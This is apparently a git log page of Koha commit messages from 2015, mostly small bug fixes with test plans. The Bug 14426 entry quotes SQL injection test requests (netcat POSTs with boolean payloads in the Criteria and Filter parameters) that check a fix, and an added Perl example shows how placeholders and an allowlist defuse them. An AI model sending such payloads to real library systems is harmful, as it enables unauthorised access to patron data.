koha.git
8 years ago Bug 14401: Zebra index configuration doesn't allow exact search for C.
Katrin Fischer [Wed, 17 Jun 2015 10:28:39 +0000 (12:28 +0200)]
Bug 14401: Zebra index configuration doesn't allow exact search for C.

2 lines in the Zebra configuration files prevent an exact search for C.,
while all other [A-Z]. searches work correctly.

After taking a look at the  /etc/zebradb/etc/word-phrase-utf.chr
those 2 lines cause the problem:

map (^c\.)          @
map (^C\.)          @

I propose to remove them.

To test:
- Catalog a record with an item with callnumber: C.
- Catalog a record with an item with callnumber: B.
- Try searching for the second using callnum,ext:B. (exact field search)
  - Verify search works.
- Try searching for the other with callnum,ext:C.
  - Verify no result.
- Apply the patch - copy the zebra config file if necessary into the right spot
- Reindex
- Repeat searches - both should not bring up the correct record.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14422: Typo in updatedatabase.pl
Mark Tompsett [Fri, 19 Jun 2015 13:00:33 +0000 (09:00 -0400)]
Bug 14422: Typo in updatedatabase.pl

TEST PLAN
---------
 1) backup db
 2) git checkout -b my_3.6.x origin/3.6.x
 3) drop db and create blank one
 4) git reset --hard origin/3.6.x
 5) run web installer
 6) set HomeorHoldingBranchReturn system preference to 'holdingbranch'.
 7) create a Default checkout, hold rule
    home -> koha administration -> Circulation and fines rules
    -- I put 10 checkouts total and clicked 'Save'
    -- there currently is not 'returnbranch' in default_circ_rules.
 8) git reset --hard origin/3.20.x
    -- or whatever version you apply this to
       (3.8.x, 3.10.x, 3.14.x, 3.16.x, 3.18.x, or 3.20.x
        -- 3.21.00.008 deletes the systempreference involved)
 9) ./installer/data/mysql/updatedatabase.pl
10) check HomeorHoldingBranchReturn systempreference
    -- Currently says 'holdingbranch', but
       the value of 'returnbranch' in default_circ_rules is
       'homebranch'.
11) repeat steps 3-8
12) apply this patch
13) repeat steps 9-10
    -- Currently says 'holdingbranch', and
       the value of 'returnbranch' in default_circ_rules is
       'holdingbranch'.
14) run koha qa test tools

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Tested using 3.6.x install, updated to 3.8.x
Value is preserved
No errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Note: I haven't followed the test plan, but the fix is trivial.
Maybe it could be worth updating 3.21.00.008 and checking the value of
HomeOrHoldingBranchReturn before deleting it.
We could raise a warning if HomeOrHoldingBranchReturn ==
'holdingbranch'.
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)
Fridolin Somers [Tue, 23 Jun 2015 15:45:30 +0000 (17:45 +0200)]
Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects opac/opac-ratings.pl

Test plan :
- Apply patch
- Set syspref OpacStarRatings to 'results and details'
- Disable JavaScript on your browser (otherwise it will use ajax)
- Login at OPAC
- Go to a record
- Click on a button left of 'Rate me' to choose a rating, ie 4
- Click on 'Rate me'
=> The page is reloaded and you see 'your rating: 4'
- Log out from OPAC
- Try to access URL : http://<serveur>/cgi-bin/koha/opac-ratings.pl
=> You see the login page

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
(cherry picked from commit f1acb5615d0cbcba5db5b84e12fbad3d41454347)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
(cherry picked from commit 3d8af819a84847b35ad08e62ba137d3febd878dd)

Conflicts:
opac/opac-ratings.pl

Signed-off-by: Liz <wizzyrea@gmail.com>
Conflicts:
opac/opac-ratings.pl

8 years ago Bug 14421: Corrected example in SMS.pm to working version with hashref.
Eivin Giske Skaaren [Fri, 19 Jun 2015 11:08:29 +0000 (13:08 +0200)]
Bug 14421: Corrected example in SMS.pm to working version with hashref.

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Test:
1) Apply patch
2) perldoc C4/SMS.pm
3) Check fixed argument in example

Argument is hashref, POD is now right
Added additional space on second arg
No errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14215: Change the 'delimiter' syspref description for its wider use
Katrin Fischer [Tue, 9 Jun 2015 00:32:46 +0000 (02:32 +0200)]
Bug 14215: Change the 'delimiter' syspref description for its wider use

Patch changes 'report files' to 'CSV files' as there are more
options now for downloading and creating CSV files where this
preference is taken into account.

To test:
- Verify the changed system preference description for
  'delimiter' is correct.

Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 10866: Hide patron's history if intranetreadinghistory is set to not allow
Jonathan Druart [Wed, 22 Apr 2015 10:14:24 +0000 (12:14 +0200)]
Bug 10866: Hide patron's history if intranetreadinghistory is set to not allow

If set to "not allow", the intranetreadinghistory pref prevents staff
members from accessing a patron's checkout history.
But:
1/ The page is still accessible if you know the url
2/ The history can be consulted on the item history page

Test plan:
0/ Don't apply this patch
1/ Set the intranetreadinghistory to allow
2/ Go on a patron's checkout history page
3/ Open a new tab and go on an item's checkout history page
4/ Set the intranetreadinghistory to not allow
5/ Refresh both pages => no change
6/ Apply this patch
7/ Refresh both pages.
On the first page, you should see a warning
On the other one, you should see that the patron column is not displayed
anymore.

Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 13427: jQuery Timepicker is not translated on returns page
Katrin Fischer [Mon, 8 Jun 2015 03:04:56 +0000 (05:04 +0200)]
Bug 13427: jQuery Timepicker is not translated on returns page

The returns page was missing an include with the translated strings.

To test:
- Install an additional language, like de-DE
- Confirm the bug on the returns page
  - Make sure SpecifyReturnDate is activated
  - Open the datepicker, look at the time settings
- Apply the patch
- Reinstall the language, no update of the po files is needed
- Retest
- Verify, that now the time settings are translated

Signed-off-by: Josef Moravec <josef.moravec@gmail.com>
Works as expected

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)
Fridolin Somers [Tue, 23 Jun 2015 15:45:30 +0000 (17:45 +0200)]
Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects opac/opac-ratings.pl

Test plan :
- Apply patch
- Set syspref OpacStarRatings to 'results and details'
- Disable JavaScript on your browser (otherwise it will use ajax)
- Login at OPAC
- Go to a record
- Click on a button left of 'Rate me' to choose a rating, ie 4
- Click on 'Rate me'
=> The page is reloaded and you see 'your rating: 4'
- Log out from OPAC
- Try to access URL : http://<serveur>/cgi-bin/koha/opac-ratings.pl
=> You see the login page

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@unc.edu.ar>
Conflicts:
opac/opac-ratings.pl

8 years ago Bug 14440: get_template_and_user can not have an empty template_name (quote*_ajax.pl)
Jonathan Druart [Wed, 24 Jun 2015 09:03:22 +0000 (11:03 +0200)]
 Bug 14440: get_template_and_user can not have an empty template_name (quote*_ajax.pl)

This patch uses check_api_auth instead of get_template_and_user.

Test plan:
Confirm that you are still able to access the quote editor with the
edit_quotes permission.
Confirm that you are not if you don't have the permission.

wget your_url/cgi-bin/koha/tools/quotes/quotes_ajax.pl
should return "403 : Forbidden."

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
8 years ago Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)
Fridolin Somers [Tue, 23 Jun 2015 15:45:30 +0000 (17:45 +0200)]
 Bug 14440: get_template_and_user can not have an empty template_name (opac-ratings.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects opac/opac-ratings.pl

Test plan :
- Apply patch
- Set syspref OpacStarRatings to 'results and details'
- Disable JavaScript on your browser (otherwise it will use ajax)
- Login at OPAC
- Go to a record
- Click on a button left of 'Rate me' to choose a rating, ie 4
- Click on 'Rate me'
=> The page is reloaded and you see 'your rating: 4'
- Log out from OPAC
- Try to access URL : http://<serveur>/cgi-bin/koha/opac-ratings.pl
=> You see the login page

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14440: get_template_and_user can not have an empty template_name (updatesupplier.pl)
Fridolin Somers [Tue, 23 Jun 2015 14:45:21 +0000 (16:45 +0200)]
Bug 14440: get_template_and_user can not have an empty template_name (updatesupplier.pl)

Since Bug 14408, the method get_template_and_user can not have an empty template_name.
Pages calling with an empty value should use C4::Auth::checkauth()

This patch corrects acqui/updatesupplier.pl

Test plan :
- Apply patch
- Connect to intranet with a user having "vendors_manage" permission
- Go to acquisition module
- Create a new vendor
- Click on "Edit vendor"
- Change some information and save
=> Your change is saved
- Connect to intranet with a user not having "vendors_manage" permission
- Try to access <intranet>/cgi-bin/koha/acqui/updatesupplier.pl
=> Access is denied
- Disconnect from intranet
- Try to access <intranet>/cgi-bin/koha/acqui/updatesupplier.pl
=> Access is denied

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 8686: Raise required version of URI::Escape to 3.31
Katrin Fischer [Sun, 7 Jun 2015 21:45:10 +0000 (23:45 +0200)]
Bug 8686: Raise required version of URI::Escape to 3.31

Raises the minimum required version of URI::Escape from
1.36 to 3.31.

TEST PLAN
---------
1) git branch -b bug_8686 origin/master
2) ./koha_perl_deps.pl -a | grep URI
   -- it will list 1.36 required
3) git bz apply 8686
4) ./koha_perl_deps.pl -a | grep URI
   -- it will list 3.31 required
5) koha qa test tools

NOTE: Also default in Ubuntu 14.04 LTS,
      not just Wheezy as noted in comment #15.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signoff based on Nicole's comment (bug 9990 comment 6):
"This stops happening if you upgrade URI::Escape to
3.31.  We should make it clear in the Perl Modules page that an upgrade
is needed."
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14426: Escape or use placeholders for sql parameters
Jonathan Druart [Mon, 22 Jun 2015 08:56:26 +0000 (10:56 +0200)]
Bug 14426: Escape or use placeholders for sql parameters

Is this patch enough to prevent SQL injection in borrowers_out.pl?

====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')"
| nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')"
| nc testbox 9002

====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a"
| nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl
HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length:
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b"
| nc testbox 9002

====================================================================

Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
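
Added example, not part of the commit or of Koha's code: the two parameters in the test requests above need different handling, because Criteria ends up as a column name (which a placeholder cannot bind) while Filter is a value. The helper name build_report_query, the allowed column list and the query shape are assumptions made for this sketch; the sample values are the form-decoded payloads from the commit message.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Columns a report may be grouped by. Assumed list for this example;
# an identifier is checked against an allowlist, never quoted or escaped.
my %ALLOWED_CRITERIA = map { $_ => 1 } qw(branchcode categorycode);

# Hypothetical helper: returns the SQL text and the values to bind.
# With DBI the result is used as:
#   my $sth = $dbh->prepare($sql);
#   $sth->execute(@bind);
sub build_report_query {
    my ( $criteria, $filter ) = @_;

    die "unsupported Criteria value\n"
      unless defined $criteria && $ALLOWED_CRITERIA{$criteria};

    # $criteria is now known to be one of the fixed strings above,
    # so interpolating it cannot introduce new SQL.
    my $sql = "SELECT $criteria, COUNT(*) FROM borrowers";
    my @bind;
    if ( defined $filter && length $filter ) {
        # The value travels separately from the statement text.
        $sql .= " WHERE categorycode = ?";
        push @bind, $filter;
    }
    $sql .= " GROUP BY $criteria";
    return ( $sql, @bind );
}

# Criteria / Filter pairs taken from the requests in the commit message.
my @requests = (
    [ 'branchcode',      'P_COM' ],
    [ 'branchcode',      "P_COM' AND 'a'='a" ],
    [ 'branchcode',      "P_COM' AND 'a'='b" ],
    [ "ELT(1=1,'evil')", 'P_COM' ],
    [ "ELT(1=2,'evil')", 'P_COM' ],
);

for my $r (@requests) {
    my ( $sql, @bind ) = eval { build_report_query(@$r) };
    if ($@) {
        chomp( my $err = $@ );
        print "rejected Criteria=$r->[0]: $err\n";
        next;
    }
    # The SQL text is identical for all three Filter values; only the
    # bound value differs, so the true/false pair returns the same
    # (empty) result instead of two distinguishable ones.
    print "sql:  $sql\n";
    print "bind: ", join( ', ', map { "[$_]" } @bind ), "\n";
}
```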
8 years ago Bug 10355: parameter 'object' lost on the road
Jonathan Druart [Thu, 16 Apr 2015 14:39:09 +0000 (16:39 +0200)]
Bug 10355: parameter 'object' lost on the road

Test plan:
1) Go to any detail page in staff
2) Click on the modification log tab
3) Verify, that the object is prefilled with the records biblionumber
and you can also see it as parameter in the url
4) Click a second time on modification log to reset your search

Before this patch, the object parameter was empty.
It now contains the value of the biblionumber.

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Work as described, no koha-qa errors

http://bugs.koha-community.org/show_bug.cgi?id=10335

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
(cherry picked from commit 0002126a2ab0ac38a8d3f144f446dc3ba69dab59)
Signed-off-by: Chris Cormack <chrisc@catalyst.net.nz>
Signed-off-by: Liz Rea <wizzyrea@gmail.com>
Conflicts:
tools/viewlog.pl

8 years ago Bug 11790: Remove dependency C4::Context from C4::Charset
Jonathan Druart [Fri, 24 Apr 2015 15:03:09 +0000 (17:03 +0200)]
Bug 11790: Remove dependency C4::Context from C4::Charset

C4::Context is only used to retrieve a syspref value.
This patch moves the use of C4::Context to a require.

Test plan:
Try to reach the SetMarcUnicodeFlag subroutine (batchmod, add/update a biblio, etc.)

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Tested on French UNIMARC install
No errors adding/editing biblios
No koha-qa errors

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14329: Useless copy/pasta from Template::Plugin::HtmlToText
Marcel de Rooy [Thu, 4 Jun 2015 10:03:42 +0000 (12:03 +0200)]
Bug 14329: Useless copy/pasta from Template::Plugin::HtmlToText

The synopsis of this TT plugin contains two example lines:
[% myhtml FILTER html2text(leftmargin => 0, rightmargin => 0) %]
[% myhtmltext | html2text %]

These lines have been copied (without too much thought :) to a few templates. Since we do not use the variables myhtml or myhtmltext in these templates, these lines are useless.

Test plan:
[1] Put some items in your cart. And send it.
[2] Send a shelf.
[3] Git grep on myhtml. Should not have results.

NOTE: Sent carts and lists in Intranet and OPAC successfully.
      Though, this does bring into question why the letters
      have HTML formatting if it is getting removed. That,
      however, is beyond the scope of this bug.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14276: Keep highlight on the active item in item editor
Marcel de Rooy [Tue, 26 May 2015 12:52:07 +0000 (14:52 +0200)]
Bug 14276: Keep highlight on the active item in item editor

The highlight only works on even items.
This patch should resolve it.

Test plan:
Edit biblio with multiple items.
Verify that the highlight is visible on the selected item you edit.
And that there is no highlight for a new item.

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14173: Paging on 'recent comments' page in OPAC is not displaying correctly
Bernardo Gonzalez Kriegel [Mon, 1 Jun 2015 18:34:00 +0000 (15:34 -0300)]
Bug 14173: Paging on 'recent comments' page in OPAC is not displaying correctly

This patch corrects the display of current page on
a multipage recent comments.

To test:
1) Enable OpacShowRecentComments

2) Add multiple comments to multiple records
I used a script to add multiple lines like
"insert into reviews values ($i, 51, $i, 'Comment $i', 1, '2015-06-01 00:00:00')"
to table reviews

3) On OPAC, go to 'Recent comments', verify the bug

4) Apply the patch

5) Reload and check correct display

Can't find missing space near 'by' from description.
Display is correct for me.

Followed test plan, displays as expected.
Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 11929: patron modification error shows borrowernumber
Marc Véron [Sun, 26 Apr 2015 19:36:25 +0000 (21:36 +0200)]
Bug 11929: patron modification error shows borrowernumber

If an error occurs in patron batch modification, a message similar to the following is displayed:
Can not update patron with borrowernumber 7055

It would be useful to have the cardnumber as well.

This patch adds the card number to the lists of errors.

It is not easy to trigger an error (see comments).
For testing, I tweaked the sub ModMember in C4/Members.pm to always return false.

TEST PLAN
---------
1) Log in as a superlibrarian and create a test user
2) Change the cardnumber to a number differing from the
   borrower number.
3) Home -> Tools -> Batch patron modification
4) Type in the cardnumber of that test user
5) Check the Library checkbox.
6) Click Save
   -- nice error, but it is borrower number instead of
      the card number which was entered.
7) Apply the patch
8) Repeat steps 3-6
   -- nice error, but it is now more informative.
9) run koha qa test tools.

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
(cherry picked from commit 3b3f82de377c87f9108bf07dd0d293182e5b9bdc)
Signed-off-by: Chris Cormack <chris@bigballofwax.co.nz>
Signed-off-by: Liz Rea <wizzyrea@gmail.com>
8 years ago Bug 14266: Trim the email address in the pl script
Jonathan Druart [Tue, 26 May 2015 11:05:51 +0000 (13:05 +0200)]
Bug 14266: Trim the email address in the pl script

The original concern of bug 14266 was to provide a compatibility for
<IE9.
But actually we don't need to trim the email address template side.
It will even be better to trim it in the perl script, so that the email
will be trimmed even if JS is disabled.

Test plan:
1/ Share a list and do not provide any email address
2/ Submit
=> The form is not submitted, no alert/message is displayed (same as
before this patch).
3/ Share a list and provide an email address with spaces before and
after
4/ Submit
=> You should receive the email

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Test output compliant with expected test plan outcome.

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Replace trim() with $.trim() in opac-shareshelf.tt
David Cook [Mon, 25 May 2015 04:07:27 +0000 (14:07 +1000)]
Replace trim() with $.trim() in opac-shareshelf.tt

This patch replaces trim() with $.trim() which is supported
in versions of IE older than IE9.

Revised test plan
=================

Before applying patch:

0) Use IE 8 or Document Mode 8 in a newer IE using F12 Developer Tools
1) Set OpacAllowSharingPrivateLists to "Allow" in Global System Preferences
2) Create a private list in the OPAC
3) Add a record to the private list
4) Click "Share" or "Share list" on one of the list screens
5) Type in an email address and click "Send"
6) Note the error in the console log
7) The page should submit

Apply the patch:

7) Hold shift + refresh the browser to update any Javascript cache
8) Try to "Share" the list again
9) Note that the form submits after clicking "Send" and
that there are no errors in the console log

http://bugs.koha-community.org/show_bug.cgi?id=14266

Signed-off-by: Indranil Das Gupta <indradg@gmail.com>
Remarks: Works as per revised test plan
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 12066: New renew page in staff client doesn't record branch in statistics
Kyle M Hall [Wed, 20 May 2015 15:31:18 +0000 (11:31 -0400)]
Bug 12066: New renew page in staff client doesn't record branch in statistics

Test Plan:
1) Apply this patch
2) Renew an item via circ/renew.pl
3) Note the branch code of your logged in library is set as the
   branch in the generated statistic line

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Tested pre and post patch, now branch is saved
No errors

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 13946: Change order status 'Pending' to 'Ordered'
Katrin Fischer [Mon, 25 May 2015 09:22:07 +0000 (11:22 +0200)]
Bug 13946: Change order status 'Pending' to 'Ordered'

The order status after closing the basket is 'ordered' in the
database, but displays as 'pending' in the staff interface.

As we use 'pending' when you have to review a suggestion, this
clashes in translations and the meaning is different. The patch
renames 'pending' for the order status to 'Ordered' to be more
clear.

To test:
- Verify 'Ordered' shows in the pull down on the acq advanced
  search and search still works correctly
- Verify the results table also display 'Ordered' as the status

Signed-off-by: Cédric Vita <cedric.vita@dracenie.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14275: Remove CGI::scrolling_list from guided_reports.pl
Bernardo Gonzalez Kriegel [Tue, 26 May 2015 14:00:02 +0000 (11:00 -0300)]
Bug 14275: Remove CGI::scrolling_list from guided_reports.pl

Remove an instance of CGI::scrolling_list from this file

To test:
1) Go to Reports, Guided report wizard, New SQL report

2) Create a report with some auth value list, e.g.

SELECT surname,firstname FROM borrowers WHERE branchcode=<<Enter patrons library|branches>>

Save

3) Click on 'Run this report', look at the dropdown, that will be changed

4) Apply the patch

5) Reload, check dropdown and any regression

Followed test plan, works as expected.
Signed-off-by: Marc Véron <veron@veron.ch>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14112 - Silence warnings in t/Charset.t
Mark Tompsett [Fri, 22 May 2015 13:02:23 +0000 (09:02 -0400)]
Bug 14112 - Silence warnings in t/Charset.t

After Jonathan said this was the wrong way to correct the issue,
www.utf8-chartable.de made it clear to me that the \c3\a9 were
missing x's.

TEST PLAN
---------
1) prove t/Charset.t
   -- noise
2) apply patch
3) prove t/Charset.t
   -- no noise
4) koha qa test tools

Signed-off-by: Aleisha <aleishaamohia@hotmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14203 - Message for non-existent lang removal
Indranil Das Gupta [Thu, 14 May 2015 19:42:11 +0000 (01:12 +0530)]
Bug 14203 - Message for non-existent lang removal

A trivial string patch to update the error message displayed to
user if koha-translate is used to attempt removal of a language
that is not installed.

Test plan
=========

1/ attempt to remove a non-existent language by
   <installdir>/debian/scripts/koha-translate --remove <langcode>
2/ it should show "Error: the selected language is not already
   installed."
3/ apply patch
4/ repeat step 1; it should show "Error: the selected language is
   not installed."

Signed-off-by: Nick Clemens <nick@quecheelibrary.org>
Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14184: Undefined $term causes noisy warns in C4/CourseReserves.pm
Aleisha [Tue, 12 May 2015 02:08:17 +0000 (02:08 +0000)]
Bug 14184: Undefined $term causes noisy warns in C4/CourseReserves.pm

This patch sets $term to be an empty string.

Test plan
=========

1/ enable 'UseCourseReserves' syspref in Circulation preferences
2/ in a terminal, run a `tail -f ` on your instance's opac-error.log
3/ go to the opac, click on 'Course reserve' tab to go to
   opac-course-reserves.pl
4/ notice the warning - "opac-course-reserves.pl: Use of uninitialized
   value $term" appear in the `tail`ed opac-error.log
5/ apply the patch
6/ reload the page (opac-course-reserves.pl)
7/ page works but the warning in step #4 is no longer logged
8/ run qa test (i.e. koha-qa.pl -c 1 -v 2), there should be no error

Remarks: Testing results match expected test plan output. The QA tests
         pass with "OK" for the commit.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14185: Undefined $limit causes warn in opac/opac-readingrecord.pl
Aleisha [Tue, 12 May 2015 03:01:35 +0000 (03:01 +0000)]
Bug 14185: Undefined $limit causes warn in opac/opac-readingrecord.pl

This patch sets $limit to be an empty string.

Test plan
=========

1/ login into the opac using your user account credentials
2/ in a terminal, run a `tail -f ` on your instance's opac-error.log
3/ go back to the opac, click on 'your reading history' tab to go to
   opac-readingrecord.pl
4/ notice the warning - "opac-readingrecord.pl: Use of uninitialized
   value $limit" appear in the `tail`ed opac-error.log
5/ apply the patch
6/ reload the page (opac-readingrecord.pl)
7/ page works but the warning in step #4 is no longer logged
8/ run qa test (i.e. koha-qa.pl -c 1 -v 2), there should be no error

Remarks: Testing results match expected test plan output. The QA tests
         pass with "OK" for the commit.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14186 [QA Followup]: Undefined $reservedfor causes warn in opac-reserve.pl
Indranil Das Gupta [Thu, 14 May 2015 01:53:16 +0000 (07:23 +0530)]
Bug 14186 [QA Followup]: Undefined $reservedfor causes warn in opac-reserve.pl

This is a followup for Bug 14186 that removes the extraneous tab
char on line 470, so that the patch can clear QA tools.

This patch sets $reservedfor to an empty string.

Test plan
=========

1/ in a terminal, run `tail -f ` on your instance's opac-error.log
2/ go to the opac and search from an item that exists on the Koha
   instance.
3/ Select the title (if more than one title is returned) and click on
   'Place hold' link to go to opac-reserve.pl
4/ notice the warning - "opac-reserve.pl: Use of uninitialized value
   $reservedfor" appear in the `tail`ed opac-error.log
5/ apply the patch
6/ reload the page (opac-reserve.pl)
7/ page works but the warning in step #4 is no longer thrown up
8/ run qa test (i.e. koha-qa.pl -c 1 -v 2), there should be no error

Remarks: Testing results match expected test plan output. The QA tests
         pass with "OK" for the commit.

Signed-off-by: Indranil Das Gupta (L2C2 Technologies) <indradg@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14186: Undefined $reservedfor causes warn in opac-reserve.pl
Aleisha [Tue, 12 May 2015 03:30:46 +0000 (03:30 +0000)]
Bug 14186: Undefined $reservedfor causes warn in opac-reserve.pl

This patch sets $reservedfor to an empty string.

Test plan
=========

1/ in a terminal, run `tail -f ` on your instance's opac-error.log
2/ go to the opac and search from an item that exists on the Koha
   instance.
3/ Select the title (if more than one title is returned) and click on
   'Place hold' link to go to opac-reserve.pl
4/ notice the warning - "opac-reserve.pl: Use of uninitialized value
   $reservedfor" appear in the `tail`ed opac-error.log
5/ apply the patch
6/ reload the page (opac-reserve.pl)
7/ page works but the warning in step #4 is no longer thrown up
8/ run qa test (i.e. koha-qa.pl -c 1 -v 2), there should be no error

Remarks: The QA test failed - "forbidden pattern: tab char (line 470)".

         Marking this as 'FAILED QA'

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14130: Update columns.def
Katrin Fischer [Mon, 4 May 2015 20:08:04 +0000 (22:08 +0200)]
Bug 14130: Update columns.def

- Updates columns.def with new columns in items
- Adds some descriptions
- Corrects some existing column descriptions

To test:
- Read the patch to see what has been changed
- Run the guided report builder for the 'circulation'
  module
- Observe changes show up

Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Changes show up, no errors

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Mason James <mtj@kohaaloha.com>
